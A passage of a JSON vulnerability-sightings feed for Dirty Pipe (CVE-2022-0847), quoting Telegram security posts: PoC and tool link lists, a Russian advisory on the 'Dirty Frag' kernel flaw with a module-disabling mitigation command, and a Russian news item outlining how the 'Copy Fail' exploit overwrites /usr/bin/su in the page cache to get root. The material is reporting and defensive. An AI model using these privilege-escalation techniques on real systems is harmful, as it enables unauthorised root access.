"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "Telegram/cYbomHaTGTLOs95SVGZEas4XOSbbs1P0dkn6F8I8p6igQwc", "content": "", "creation_timestamp": "2026-05-02T15:00:06.000000Z"}, {"uuid": "d5f50a00-1e7b-4b65-9360-1c3a9cad8398", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/5560", "content": "#Threat_Research\n1. The Dirty Pipe Vulnerability (CVE-2022-0847)\nhttps://dirtypipe.cm4all.com\n2. CVE-2022-24990: TerraMaster TOS unauthenticated remote command execution via PHP Object Instantiation\nhttps://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation\n3. Escaping privileged containers\nhttps://pwning.systems/posts/escaping-containers-for-fun", "creation_timestamp": "2022-03-08T13:08:01.000000Z"}, {"uuid": "c0f14bca-2a2e-4de5-b30f-eaf1146c5a60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/5786", "content": "#Analytics\nTop 10 Most Used Vulns of the Month (Mar 1-31)\n\nCVE-2022-1096 - Type Confusion in V8\nhttps://github.com/Maverick-cmd/Chrome-and-Edge-Version-Dumper\nCVE-2022-0847 - Dirty Pipe Vuln\nhttps://t.me/CyberSecurityTechnologies/5560\nCVE-2022-0778 - OpenSSL Illegal x.509 certificate construction\nhttps://t.me/CyberSecurityTechnologies/5692\nCVE-2022-0492 - Privilege escalation vuln causing container escape\nhttps://sysdig.com/blog/detecting-mitigating-cve-2022-0492-sysdig\nCVE-2022-22947 - Spring Cloud Gateway RCE\nhttps://t.me/CyberSecurityTechnologies/5554\nCVE-2022-22963 - Spring Core RCE\nhttps://t.me/CyberSecurityTechnologies/5711\nCVE-2022-25636 - net/netfilter/nf_dup_netdev.c in the Linux kernel <5.6.10 allows local users to gain privileges because of a heap out-of-bounds write\nhttps://t.me/CyberSecurityTechnologies/5570\nCVE-2022-27254 - Vuln in Honda's Remote Keyless System\nhttps://github.com/nonamecoder/CVE-2022-27254\nCVE-2022-0609 - https://blog.google/threat-analysis-group/countering-threats-north-korea", "creation_timestamp": "2022-04-11T11:00:21.000000Z"}, {"uuid": "ac57a112-d3e2-456a-bd98-21489bb4497f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/5979", "content": "#Threat_Research\n1. Learning Linux kernel exploitation\nPart 2 - DirtyPipe (CVE-2022-0847)\nhttps://0x434b.dev/learning-linux-kernel-exploitation-part-2-cve-2022-0847\n2. F5 iControl REST Endpoint Authentication Bypass Technical Deep Dive\nhttps://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive", "creation_timestamp": "2022-05-10T13:27:41.000000Z"}, {"uuid": "0cc50dd8-2fc0-47a6-ad90-76154a21f5ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/9332", "content": "#tools\n#Blue_Team_Techniques\n1. Cross-language temporary email detection library (covers 55 734+ fake email providers)\nhttps://github.com/FGRibreau/mailchecker\n2. LDAPMon - POC telemetry collector for Windows LDAP Client ETW Provider\nhttps://github.com/jsecurity101/LDAPMon\n3. An eBPF program to detect and defense attacks on CVE-2022-0847 (DirtyPipe)\nhttps://github.com/h4ckm310n/CVE-2022-0847-eBPF", "creation_timestamp": "2023-11-05T17:50:38.000000Z"}, {"uuid": "28e88525-42f7-4489-b3b4-ee0660ff8450", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/1638", "content": "#tools\n#Blue_Team_Techniques\n1. Cross-language temporary email detection library (covers 55 734+ fake email providers)\nhttps://github.com/FGRibreau/mailchecker\n2. LDAPMon - POC telemetry collector for Windows LDAP Client ETW Provider\nhttps://github.com/jsecurity101/LDAPMon\n3. An eBPF program to detect and defense attacks on CVE-2022-0847 (DirtyPipe)\nhttps://github.com/h4ckm310n/CVE-2022-0847-eBPF", "creation_timestamp": "2024-08-16T08:43:29.000000Z"}, {"uuid": "3594a834-c169-4e34-93b8-7b95bb19b1b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "published-proof-of-concept", "source": "https://t.me/LearnExploit/5529", "content": "Traitor - Exploit Low-Hanging Fruit Automatically\n\n- Nearly all of GTFOBins\n- Writeable docker.sock\n- CVE-2022-0847 (Dirty pipe)\n- CVE-2021-4034 (pwnkit)\n- CVE-2021-3560\n\nGithub\n\n#Linux #Exploit #Tools \n\u2014\u2014\u2014\u2014\u2014\u2014\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2023-09-26T09:46:31.000000Z"}, {"uuid": "69cb7889-5a64-4758-98fd-c2f79b838422", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://gist.github.com/tgies/e6db71355e3a930dd72c4e0f25f4dd26", "content": "", "creation_timestamp": "2026-04-29T21:13:56.000000Z"}, {"uuid": "b773e004-16e6-49bb-95f7-7d662bea74ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://t.me/ptescalator/718", "content": "Dirty Frag \ud83d\udc27\ud83d\udca5\n\n\u0421\u043f\u0443\u0441\u0442\u044f \u043d\u0435\u0434\u0435\u043b\u044e \u043f\u043e\u0441\u043b\u0435 \u043d\u0430\u0448\u0443\u043c\u0435\u0432\u0448\u0435\u0433\u043e Copy.Fail \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c v4bel \u0440\u0430\u0441\u043a\u0440\u044b\u043b \u043d\u043e\u0432\u0443\u044e \u0442\u0435\u0445\u043d\u0438\u043a\u0443 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 \u044f\u0434\u0440\u0435 Linux \u2014 Dirty Frag.\n\n\u041f\u043e \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u044e \u043d\u0430 8 \u043c\u0430\u044f \u0443 Dirty Frag \u043d\u0435\u0442 CVE-\u043d\u043e\u043c\u0435\u0440\u0430 \u0438, \u0447\u0442\u043e \u0431\u043e\u043b\u0435\u0435 \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u043e, \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u0430\u0442\u0447\u0430 \u043e\u0442 \u043c\u0435\u0439\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u043e\u0432 \u044f\u0434\u0440\u0430 \u0442\u043e\u0436\u0435 \u043d\u0435\u0442. Dirty Frag \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0441\u044f \u043a \u0442\u043e\u043c\u0443 \u0436\u0435 \u043a\u043b\u0430\u0441\u0441\u0443, \u0447\u0442\u043e Dirty Pipe \u0438 Copy.Fail, \u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0434\u0440\u0443\u0433\u043e\u0439 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c: \u0432\u043c\u0435\u0441\u0442\u043e pipe_buffer \u0430\u0442\u0430\u043a\u0443\u0435\u0442\u0441\u044f \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0430 sk_buff.\n\n\u041e\u0431\u0449\u0438\u0435 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u044b \u0440\u0430\u0431\u043e\u0442\u044b \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043d\u0430\u0434\u0435\u0436\u043d\u043e \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0447\u0435\u0441\u043a\u043e\u0439 \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u0438\u0437\u043e\u0439 \u0432 PT Sandbox (Exploit.Linux.CVE-2022-0847.a, Exploit.Linux.CVE-2026-31431.a, Backdoor.Linux.Generic.a) \u2014 \u0441\u043c\u043e\u0442\u0440\u0438\u0442\u0435 \u043d\u0430 \u0441\u043a\u0440\u0438\u043d\u0448\u043e\u0442\u0435.\n\n\u041a\u0430\u043a \u044d\u0442\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442? \ud83e\uddd0\n\nDirty Frag \u2014 \u044d\u0442\u043e \u0446\u0435\u043f\u043e\u0447\u043a\u0430 \u0438\u0437 \u0434\u0432\u0443\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0434\u043e\u043f\u043e\u043b\u043d\u044f\u044e\u0442 \u0434\u0440\u0443\u0433 \u0434\u0440\u0443\u0433\u0430, \u0447\u0442\u043e\u0431\u044b \u043e\u0445\u0432\u0430\u0442\u0438\u0442\u044c \u0432\u0441\u0435 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u044b:\n\n1\ufe0f\u20e3 Page-Cache Write (\u0441 2017 \u0433\u043e\u0434\u0430): \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0434\u043b\u044f \u0437\u0430\u043f\u0438\u0441\u0438 4 \u0431\u0430\u0439\u0442 \u0432 \u043a\u044d\u0448 \u0441\u0442\u0440\u0430\u043d\u0438\u0446, \u043d\u043e \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u043f\u0440\u0430\u0432\u0430 \u043d\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0445 \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432 \u0438\u043c\u0435\u043d, \u0447\u0442\u043e \u0432 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, Ubuntu) \u043c\u043e\u0436\u0435\u0442 \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f AppArmor.\n\n2\ufe0f\u20e3 RxRPC Page-Cache Write (\u0441 \u0438\u044e\u043d\u044f 2023 \u0433\u043e\u0434\u0430): \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u043f\u0440\u0430\u0432 \u043d\u0430 \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u0430 \u0438\u043c\u0435\u043d, \u043d\u043e \u043c\u043e\u0434\u0443\u043b\u044c rxrpc.ko \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0442\u043e\u043b\u044c\u043a\u043e \u0432 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445, \u0432\u043a\u043b\u044e\u0447\u0430\u044f Ubuntu, \u0433\u0434\u0435 \u043e\u043d \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e.\n\n\u041e\u0431\u044a\u0435\u0434\u0438\u043d\u0438\u0432 \u0438\u0445, \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0439 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442 \u0440\u0430\u0431\u043e\u0447\u0438\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043d\u0430 \u043b\u044e\u0431\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442:\n\n\u2022 \u041f\u043e\u0434\u043c\u0435\u043d\u0438\u0442\u044c suid-\u0444\u0430\u0439\u043b\u044b (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, /usr/bin/su) \u043d\u0430 \u0441\u0432\u043e\u044e \u0432\u0435\u0440\u0441\u0438\u044e\n\u2022 \u0418\u0437\u043c\u0435\u043d\u0438\u0442\u044c /etc/passwd, \u043e\u0447\u0438\u0441\u0442\u0438\u0432 \u043f\u0430\u0440\u043e\u043b\u044c root-\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\n\n\u041a\u0442\u043e \u043f\u043e\u0434 \u0443\u0433\u0440\u043e\u0437\u043e\u0439? \u26f3\ufe0f\n\n\u041f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0441\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0441 \u044f\u0434\u0440\u043e\u043c Linux, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0435 \u0441 2017 \u0433\u043e\u0434\u0430. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u043b \u0440\u0430\u0431\u043e\u0442\u0443 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430 \u043d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445: Ubuntu 24.04.4, RHEL 10.1, openSUSE Tumbleweed, CentOS Stream 10, AlmaLinux 10, Fedora 44 \u0438 \u0434\u0440\u0443\u0433\u0438\u0445.\n\n\u041a\u0430\u043a \u0437\u0430\u0449\u0438\u0442\u0438\u0442\u044c\u0441\u044f? \ud83d\udd27\n\n\u0422\u0430\u043a \u043a\u0430\u043a \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u0430\u0442\u0447\u0430 \u043e\u0442 \u043c\u0435\u0439\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u043e\u0432 \u044f\u0434\u0440\u0430 \u043f\u043e\u043a\u0430 \u043d\u0435\u0442, \u0435\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0439 \u0441\u043f\u043e\u0441\u043e\u0431 \u0437\u0430\u0449\u0438\u0442\u044b \u2014 \u043d\u0435\u043c\u0435\u0434\u043b\u0435\u043d\u043d\u043e \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u0438 \u0432\u044b\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u043c\u043e\u0434\u0443\u043b\u0438 \u044f\u0434\u0440\u0430.\n\n\u041a\u043e\u043c\u0430\u043d\u0434\u0430 \u0434\u043b\u044f \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f:\n\nsh -c \"printf 'install esp4 /bin/false\\ninstall esp6 /bin/false\\ninstall rxrpc /bin/false\\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; true\"\n\n\u041d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u044b (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, AlmaLinux) \u043d\u0430\u0447\u0430\u043b\u0438 \u0432\u044b\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u043f\u0430\u0442\u0447\u0438, \u043d\u0435 \u0434\u043e\u0436\u0438\u0434\u0430\u044f\u0441\u044c \u0430\u043f\u0441\u0442\u0440\u0438\u043c\u0430.\n\n#avlab #cve #linux #sandbox\n@ptescalator (X, Max)", "creation_timestamp": "2026-05-08T09:08:22.000000Z"}, {"uuid": "989762d1-f66c-463a-9cda-e4ccff96a2a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0847", "type": "seen", "source": "https://t.me/true_secator/8160", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0440\u0430\u0441\u043a\u0440\u044b\u043b\u0438 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 LPE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Linux, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0440\u0430\u0432\u0430 root.\n\n\u041e\u043d\u0430 \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a CVE-2026-31431 (CVSS: 7,8 \u0438 \u0431\u044b\u043b\u0430 \u043d\u0430\u0437\u0432\u0430\u043d\u0430 Xint.io \u0438 Theori - Copy Fail. \u041a\u0430\u043a \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438, \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u0447\u0435\u0442\u044b\u0440\u0435 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c\u044b\u0445 \u0431\u0430\u0439\u0442\u0430 \u0432 \u043a\u044d\u0448 \u0441\u0442\u0440\u0430\u043d\u0438\u0446 \u043b\u044e\u0431\u043e\u0433\u043e \u0447\u0438\u0442\u0430\u0435\u043c\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 Linux \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f root.\n\n\u0424\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u043e\u0448\u0438\u0431\u043a\u043e\u0439 \u0432 \u043a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u044f\u0434\u0440\u0430 Linux, \u0430 \u0438\u043c\u0435\u043d\u043d\u043e \u0432 \u043c\u043e\u0434\u0443\u043b\u0435 algif_aead. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0432 \u043a\u043e\u043c\u043c\u0438\u0442\u0435 \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u043e\u0442 \u0430\u0432\u0433\u0443\u0441\u0442\u0430 2017 \u0433\u043e\u0434\u0430.\n\n\u0423\u0441\u043f\u0435\u0448\u043d\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u0440\u043e\u0441\u0442\u043e\u043c\u0443 \u0441\u043a\u0440\u0438\u043f\u0442\u0443 \u043d\u0430 Python \u0440\u0430\u0437\u043c\u0435\u0440\u043e\u043c 732 \u0431\u0430\u0439\u0442\u0430 \u0440\u0435\u0434\u0430\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u0444\u0430\u0439\u043b \u0441 \u0444\u043b\u0430\u0433\u043e\u043c setuid \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u043f\u0440\u0430\u0432\u0430 root \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u043e \u0432\u0441\u0435\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445 Linux, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0445 \u0441 2017 \u0433\u043e\u0434\u0430, \u0432\u043a\u043b\u044e\u0447\u0430\u044f Amazon Linux, RHEL, SUSE \u0438 Ubuntu. \n\n\u0421\u0430\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043d\u0430 Python \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u0442\u0441\u044f \u0447\u0435\u0440\u0435\u0437 \u0441\u043e\u043a\u0435\u0442 AF_ALG \u0432 \u0441\u0432\u044f\u0437\u043a\u0435 \u0441 authencesn(hmac(sha256),cbc(aes)) \u043f\u0443\u0442\u0435\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 \u0437\u0430\u043f\u0438\u0441\u0438 \u0432 \u043a\u044d\u0448\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u043a\u043e\u043f\u0438\u0438 \u044f\u0434\u0440\u0430 /usr/bin/su \u0438 \u0432\u044b\u0437\u043e\u0432\u0430 execve(\"/usr/bin/su\") \u0434\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u043d\u043e\u0433\u043e \u0448\u0435\u043b\u043b\u043a\u043e\u0434\u0430 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0435\u0433\u043e \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 root.\n\n\u041d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0442\u043e, \u0447\u0442\u043e \u0441\u0430\u043c\u0430 \u043f\u043e \u0441\u0435\u0431\u0435 \u044d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0435 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e, \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0439 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c root-\u043f\u0440\u0430\u0432\u0430, \u043f\u0440\u043e\u0441\u0442\u043e \u043f\u043e\u0432\u0440\u0435\u0434\u0438\u0432 \u043a\u044d\u0448 \u0441\u0442\u0440\u0430\u043d\u0438\u0446 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 \u0441 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u043c \u0444\u043b\u0430\u0433\u043e\u043c setuid.\n\n\u042d\u0442\u0430 \u0436\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0442\u0430\u043a\u0436\u0435 \u0438\u043c\u0435\u0435\u0442 \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f \u0434\u043b\u044f \u0434\u0440\u0443\u0433\u0438\u0445 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u043e\u0432, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043a\u044d\u0448 \u0441\u0442\u0440\u0430\u043d\u0438\u0446 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432\u0441\u0435\u043c\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430\u043c\u0438 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435.\n\n\u0412 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c, \u0432 \u043e\u0442\u0432\u0435\u0442 \u043d\u0430 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0435 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445  \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u043e\u0432 Linux \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f (Amazon Linux, Debian, Red Hat Enterprise Linux, SUSE \u0438 Ubuntu)\n\n\u041f\u0440\u0438\u043c\u0435\u0447\u0441\u0430\u0442\u0435\u043b\u044c\u043d\u043e, \u0447\u0442\u043e Copy Fail \u043f\u0435\u0440\u0435\u043a\u043b\u0438\u043a\u0430\u0435\u0442\u0441\u044f \u0441 Dirty Pipe (CVE-2022-0847), \u0434\u0440\u0443\u0433\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e LPE \u0432 \u044f\u0434\u0440\u0435 Linux, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0432\u043d\u0435\u0434\u0440\u044f\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u0432 \u043a\u044d\u0448 \u0441\u0442\u0440\u0430\u043d\u0438\u0446 \u0444\u0430\u0439\u043b\u043e\u0432, \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f, \u0438 \u0432 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u043c \u0438\u0442\u043e\u0433\u0435 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0442\u044c \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430.\n\n\u041a\u0430\u043a \u043e\u0442\u043c\u0435\u0442\u0438\u043b\u0438 \u0432 Bugcrowd, \u043e\u0448\u0438\u0431\u043a\u0430 \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f - \u044d\u0442\u043e 